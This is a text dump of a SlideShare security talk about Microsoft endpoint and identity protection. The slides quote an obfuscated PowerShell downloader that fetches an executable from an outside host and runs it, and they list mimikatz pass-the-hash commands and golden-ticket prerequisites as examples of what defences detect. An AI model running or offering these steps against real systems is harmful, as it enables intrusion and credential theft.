SlideShare a Scribd company logo
1 of 31
The new era of endpoint security
Alexander Benoit
Microsoft MVP Enterprise Security | Certified Ethical Hacker
@ITPirate
Alex Benoit
Lead Security Analyst
Modern Secure Workplace
Microsoft Threat Protection
Alexander.Benoit@sepago.de
@ITPirate | @TrustInTechCGN | @GeekZeugs
https://it-pirate.com/
Microsoft Threat Protection
Obfuscation
((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`t}.” `I`N`V`o`k`e`C`o`m`m`A`N`D”).”
`N`e`w`S`c`R`i`p`T`B`l`o`c`k”((&(`G`C`M *w=O*)” `N`e`t`. `W`e`B`C`l`i`e`N`T”).”
`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘ht’+’tps://bit.ly/XYZ’)))
$nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object')
System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = '
http://aposdiqwpoe.com/BUR/testv.php?l=ando6.yarn'.Split('@');$SDC =
$env:public + '' + $NSB + ('.ex'+'e');foreach($asfc in
$ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-
Item')($SDC);break;}catch{}
protect your data
Sandboxing
and detonation
• anonymous links
• companywide sharing
• explicit sharing
• guest user activity
collaboration signals
• malware in email + SPO
• Windows Defender
• Windows Defender ATP
• suspicious logins
• risky IP addresses
• irregular file activity
threat feeds
• users
• IPs
• On-demand patterns
(e.g. WannaCry)
activity watch lists
Leverage Signals
Apply Smart Heuristics
Files in SPO, ODB
and Teams
1st and 3rd
party reputation
Multiple AV
engines
SharePoint OneDrive Microsoft Teams
protect your data
******
Require
MFA
Allow
access
Deny
access
Force
password
reset
Limit
access
Controls
Users
Devices
Location
Apps
Conditions
Machine
learning
Policies
Real time
Evaluation
Engine
3
10TB
Effective
policy
Session
Risk
conditional access
conditional access
conditional access
conditional access
conditional access
conditional access
conditional access
conditional access
conditional access
pass-the-hash
1. mimikatz
2. privilege::debug
3. sekurlsa::logonpasswords
4. sekurlsa::pth /user:Captain
/ntlm:6f0bafeef436381c8d38d106c767f6c8
/domain:itpirate.local
pass-the-ticket
1. krbtgt user’s NTLM hash (e.g. from a previous NTDS.DIT dump)
2. Domain name
3. Domain’s SID
4. Username that we’d like to impersonate
pass-the-ticket
1. krbtgt user’s NTLM hash
2. Domain name
3. Domain’s SID
4. Username that we’d like to impersonate
pass-the-ticket
1. krbtgt user’s NTLM hash
2. Domain name
3. Domain’s SID
4. Username that we’d like to impersonate
pass-the-ticket
pass-the-ticket
pass-the-ticket
pass-the-ticket
protect your admin identity
protection against identity theft
Abnormalresourceaccess
Account enumeration
Net Sessionenumeration
DNS enumeration
SAM-R Enumeration
Abnormalworking hours
Brute force using NTLM, Kerberos, or LDAP
Sensitiveaccountsexposed in plain text
authentication
Serviceaccountsexposed in plaintext
authentication
Honey Tokenaccountsuspicious activities
Unusualprotocol implementation
MaliciousDataProtectionPrivateInformation
(DPAPI) Request
AbnormalVPN
Abnormalauthenticationrequests
Abnormalresourceaccess
Pass-the-Ticket
Pass-the-Hash
Overpass-the-Hash
Maliciousservicecreation
MS14-068exploit
(Forged PAC)
MS11-013exploit (Silver
PAC)
Skeletonkey malware
Goldenticket
Remoteexecution
Maliciousreplicationrequests
AbnormalModificationof
SensitiveGroups
Reconnaissance
!
!
!
Compromised
Credential
Lateral
Movement
Privilege
Escalation
Domain
Dominance
protection against cloud threats
Malicious Insider
Protect against disgruntled
employees before they cause
damage
Ransomware
Identify ransomware using sophisticated
behavioral analytics technology
Rogue Application
Identify rouge applications that
access your data
Compromised Accounts
Combat advanced attackers that
leverage compromise user credentials
Malware
Detect malware in cloud storage
as soon as it’s uploaded
Data exfiltration
Detect unusual flow of data outside
of your organization
detection across cloud apps
Unusualfile shareactivity
Unusualfile download
Unusualfile deletionactivity
Ransomwareactivity
Data exfiltrationto unsanctionedapps
Activityby a terminatedemployee
Indicators of a
compromised session
Malicious use of
an end-user account
Threat delivery
and persistence
!
!
!
Malicious use of
a privileged user
Activityfrom suspicious IP addresses
Activityfrom anonymousIP addresses
Activityfrom an infrequentcountry
Impossible travelbetweensessions
Logon attempt from a suspicious user agent
Malwareimplantedin cloud apps
MaliciousOAuthapplication
Multiplefailed login attempts to app
Suspicious inbox rules (delete,forward)
Unusualimpersonatedactivity
Unusualadministrativeactivity
Unusualmultiple deleteVM activity
malware detection
• Scan cloud storage apps
• Identify potentially risky files
Thank You!
Gold Silver
Conference Partner

More Related Content

What's hot

Crypto failures every developer should avoid
Crypto failures every developer should avoidCrypto failures every developer should avoid
Crypto failures every developer should avoid
Filip Šebesta
 
CITEC #CON2-Dirty Attack with Google Hacking
CITEC #CON2-Dirty Attack with Google HackingCITEC #CON2-Dirty Attack with Google Hacking
CITEC #CON2-Dirty Attack with Google Hacking
Prathan Phongthiproek
 

What's hot (20)

Identity theft jfall17
Identity theft jfall17Identity theft jfall17
Identity theft jfall17
 
Security Theatre - Benelux
Security Theatre - BeneluxSecurity Theatre - Benelux
Security Theatre - Benelux
 
Lessons from Billions of Breached Records
Lessons from Billions of Breached RecordsLessons from Billions of Breached Records
Lessons from Billions of Breached Records
 
Security Theatre - PHP UK Conference
Security Theatre - PHP UK ConferenceSecurity Theatre - PHP UK Conference
Security Theatre - PHP UK Conference
 
Crypto failures every developer should avoid
Crypto failures every developer should avoidCrypto failures every developer should avoid
Crypto failures every developer should avoid
 
#RootedCON2012 - DNS: A botnet dialect - Carlos Diaz & Francisco J. Gomez
#RootedCON2012 - DNS: A botnet dialect - Carlos Diaz & Francisco J. Gomez#RootedCON2012 - DNS: A botnet dialect - Carlos Diaz & Francisco J. Gomez
#RootedCON2012 - DNS: A botnet dialect - Carlos Diaz & Francisco J. Gomez
 
CITEC #CON2-Dirty Attack with Google Hacking
CITEC #CON2-Dirty Attack with Google HackingCITEC #CON2-Dirty Attack with Google Hacking
CITEC #CON2-Dirty Attack with Google Hacking
 
Cross-site Scripting
Cross-site ScriptingCross-site Scripting
Cross-site Scripting
 
Stateless Microservice Security via JWT and MicroProfile - Guatemala
Stateless Microservice Security via JWT and MicroProfile - GuatemalaStateless Microservice Security via JWT and MicroProfile - Guatemala
Stateless Microservice Security via JWT and MicroProfile - Guatemala
 
Stateless Microservice Security via JWT and MicroProfile - ES
Stateless Microservice Security via JWT and MicroProfile - ES Stateless Microservice Security via JWT and MicroProfile - ES
Stateless Microservice Security via JWT and MicroProfile - ES
 
Stateless Microservice Security via JWT and MicroProfile - Mexico
Stateless Microservice Security via JWT and MicroProfile - MexicoStateless Microservice Security via JWT and MicroProfile - Mexico
Stateless Microservice Security via JWT and MicroProfile - Mexico
 
Token based-oauth2
Token based-oauth2Token based-oauth2
Token based-oauth2
 
2018 SDJUG Deconstructing and Evolving REST Security
2018 SDJUG Deconstructing and Evolving REST Security2018 SDJUG Deconstructing and Evolving REST Security
2018 SDJUG Deconstructing and Evolving REST Security
 
PDX Tech Meetup - The changing landscape of passwords
PDX Tech Meetup - The changing landscape of passwordsPDX Tech Meetup - The changing landscape of passwords
PDX Tech Meetup - The changing landscape of passwords
 
[ETHCon Korea 2019] Jang jaehyuk 장재혁
[ETHCon Korea 2019] Jang jaehyuk 장재혁[ETHCon Korea 2019] Jang jaehyuk 장재혁
[ETHCon Korea 2019] Jang jaehyuk 장재혁
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 
Stu r33 b (2)
Stu r33 b (2)Stu r33 b (2)
Stu r33 b (2)
 
Beyond Mirai: The new age of MDDoS attacks
Beyond Mirai: The new age of MDDoS attacksBeyond Mirai: The new age of MDDoS attacks
Beyond Mirai: The new age of MDDoS attacks
 
Web Vulnerabilities - Building Basic Security Awareness
Web Vulnerabilities - Building Basic Security AwarenessWeb Vulnerabilities - Building Basic Security Awareness
Web Vulnerabilities - Building Basic Security Awareness
 
Iam r31 a (2)
Iam r31 a (2)Iam r31 a (2)
Iam r31 a (2)
 

Similar to ExpertsLiveEurope The New Era Of Endpoint Security

Django SEM
Django SEMDjango SEM
Django SEM
Gandi24
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 

Similar to ExpertsLiveEurope The New Era Of Endpoint Security (20)

IS Security Presentation
IS Security PresentationIS Security Presentation
IS Security Presentation
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycle
 
How Credential Stuffing is Evolving - PasswordsCon 2019
How Credential Stuffing is Evolving - PasswordsCon 2019How Credential Stuffing is Evolving - PasswordsCon 2019
How Credential Stuffing is Evolving - PasswordsCon 2019
 
Django SEM
Django SEMDjango SEM
Django SEM
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Cargo Cult Security at OpenWest
Cargo Cult Security at OpenWestCargo Cult Security at OpenWest
Cargo Cult Security at OpenWest
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
February 2016 Webinar Series - Best Practices for IoT Security in the Cloud
February 2016 Webinar Series - Best Practices for IoT Security in the CloudFebruary 2016 Webinar Series - Best Practices for IoT Security in the Cloud
February 2016 Webinar Series - Best Practices for IoT Security in the Cloud
 
Dreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligenceDreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat Intelligence
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
 
ID連携入門 (実習編) - Security Camp 2016
ID連携入門 (実習編) - Security Camp 2016ID連携入門 (実習編) - Security Camp 2016
ID連携入門 (実習編) - Security Camp 2016
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
 
Breaking ssl
Breaking sslBreaking ssl
Breaking ssl
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Securing Your BBC Identity
Securing Your BBC IdentitySecuring Your BBC Identity
Securing Your BBC Identity
 

More from Alexander Benoit

More from Alexander Benoit (6)

Windows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutionsWindows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutions
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included features
 
Microsoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampMicrosoft Cyber Security IT-Camp
Microsoft Cyber Security IT-Camp
 
Experts Live Europe 2017 - Windows 10 Servicing - the do’s and don'ts
Experts Live Europe 2017 -  Windows 10 Servicing - the do’s and don'tsExperts Live Europe 2017 -  Windows 10 Servicing - the do’s and don'ts
Experts Live Europe 2017 - Windows 10 Servicing - the do’s and don'ts
 
Experts Live Europe 2017 - Windows 10 and the cloud - why the future needs hy...
Experts Live Europe 2017 - Windows 10 and the cloud - why the future needs hy...Experts Live Europe 2017 - Windows 10 and the cloud - why the future needs hy...
Experts Live Europe 2017 - Windows 10 and the cloud - why the future needs hy...
 
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
 

Recently uploaded

Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
panagenda
 

Recently uploaded (20)

WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
 
Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024
 
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
 
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfLinux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System Strategy
 
Overview of Hyperledger Foundation
Overview of Hyperledger FoundationOverview of Hyperledger Foundation
Overview of Hyperledger Foundation
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024
 
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdf
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!
 
Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at Comcast
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
Long journey of Ruby Standard library at RubyKaigi 2024
Long journey of Ruby Standard library at RubyKaigi 2024Long journey of Ruby Standard library at RubyKaigi 2024
Long journey of Ruby Standard library at RubyKaigi 2024
 
Syngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdf
 
IESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIESVE for Early Stage Design and Planning
IESVE for Early Stage Design and Planning
 
Your enemies use GenAI too - staying ahead of fraud with Neo4j
Your enemies use GenAI too - staying ahead of fraud with Neo4jYour enemies use GenAI too - staying ahead of fraud with Neo4j
Your enemies use GenAI too - staying ahead of fraud with Neo4j
 

ExpertsLiveEurope The New Era Of Endpoint Security

Editor's Notes

  1. https://it-pirate-demo-workspace.atp.azure.com/securityAlert/3c6adc23-9820-4268-9800-12917616d147